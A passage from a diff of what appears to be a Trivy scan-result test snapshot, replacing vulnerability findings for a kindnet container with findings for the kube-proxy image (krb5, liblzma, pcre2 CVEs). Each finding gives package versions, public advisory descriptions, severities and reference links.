"https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.3.2", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-3121", - "installedVersion": "v1.3.1", - "packageName": "github.com/gogo/protobuf", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-3121", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", - "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", - "https://github.com/advisories/GHSA-c3h9-896r-86jm", - "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", - "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", - "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", - "https://pkg.go.dev/vuln/GO-2021-0053", - "https://security.netapp.com/advisory/ntap-20210219-0006/", - "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "An issue was discovered in GoGo Protobuf before 1.3.2. plugin/unmarshal/unmarshal.go lacks certain index validation, aka the "skippy peanut butter" issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3121", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3121", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3121", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://discuss.hashicorp.com/t/hcsec-2021-23-consul-exposed-to-denial-of-service-in-gogo-protobuf-dependency/29025", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-c3h9-896r-86jm", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://github.com/gogo/protobuf/commit/b03c65ea87cdc3521ede29f62fe3ce239267c1bc", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "5.2.5-2.1~deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.5-2", + "packageName": "liblzma5", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", + ], + }, + "category": "Vulnerability", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "arbitrary-file-write vulnerability", + "references": [ { "type": "URL", - "value": "https://github.com/gogo/protobuf/compare/v1.3.1...v1.3.2", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r88d69555cb74a129a7bf84838073b61259b4a3830190e05a3b87994e@%3Ccommits.pulsar.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc1e9ff22c5641d73701ba56362fb867d40ed287cca000b131dcf4a44@%3Ccommits.pulsar.apache.org%3E", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3121", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0053", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0006/", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3121", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20201216223049-8b5274cf687f", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-29652", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-29652", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", - "https://errata.almalinux.org/8/ALSA-2021-1796.html", - "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", - "https://go-review.googlesource.com/c/crypto/+/278852", - "https://go.dev/cl/278852", - "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", - "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", - "https://linux.oracle.com/cve/CVE-2020-29652.html", - "https://linux.oracle.com/errata/ELSA-2021-1796.html", - "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "https://pkg.go.dev/vuln/GO-2021-0227", - "https://www.cve.org/CVERecord?id=CVE-2020-29652", - ], - }, - "category": "Vulnerability", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.0-20201203163018-be400aefbc4c for Go allows remote attackers to cause a denial of service against SSH servers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-29652", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-29652", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29652", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-1796.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3vm4-22fp-5rfm", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://go-review.googlesource.com/c/crypto/+/278852", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://go.dev/cl/278852", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/8b5274cf687fd9316b4108863654cc57385531e8", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/ouZIlBimOsE?pli=1", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-29652.html", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-1796.html", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r68032132c0399c29d6cdc7bd44918535da54060a10a12b1591328bff@%3Cnotifications.skywalking.apache.org%3E", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0227", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-29652", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1586", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/errata/RHSA-2022:5809", + "https://access.redhat.com/security/cve/CVE-2022-1586", + "https://bugzilla.redhat.com/2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "https://errata.rockylinux.org/RLSA-2022:5809", + "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "https://linux.oracle.com/cve/CVE-2022-1586.html", + "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1586", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - }, - { - "type": "URL", - "value": "https://go.dev/cl/368814/", - }, - { - "type": "URL", - "value": "https://go.dev/issues/49932", - }, - { - "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://avd.aquasec.com/nvd/cve-2022-1586", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://access.redhat.com/errata/RHSA-2022:5809", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://access.redhat.com/security/cve/CVE-2022-1586", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://bugzilla.redhat.com/2077976", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20201002170205-7f63de1d35b0", - "packageName": "golang.org/x/crypto", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", - ], - }, - "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://errata.rockylinux.org/RLSA-2022:5809", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "10.36-2+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", + ], + }, + "category": 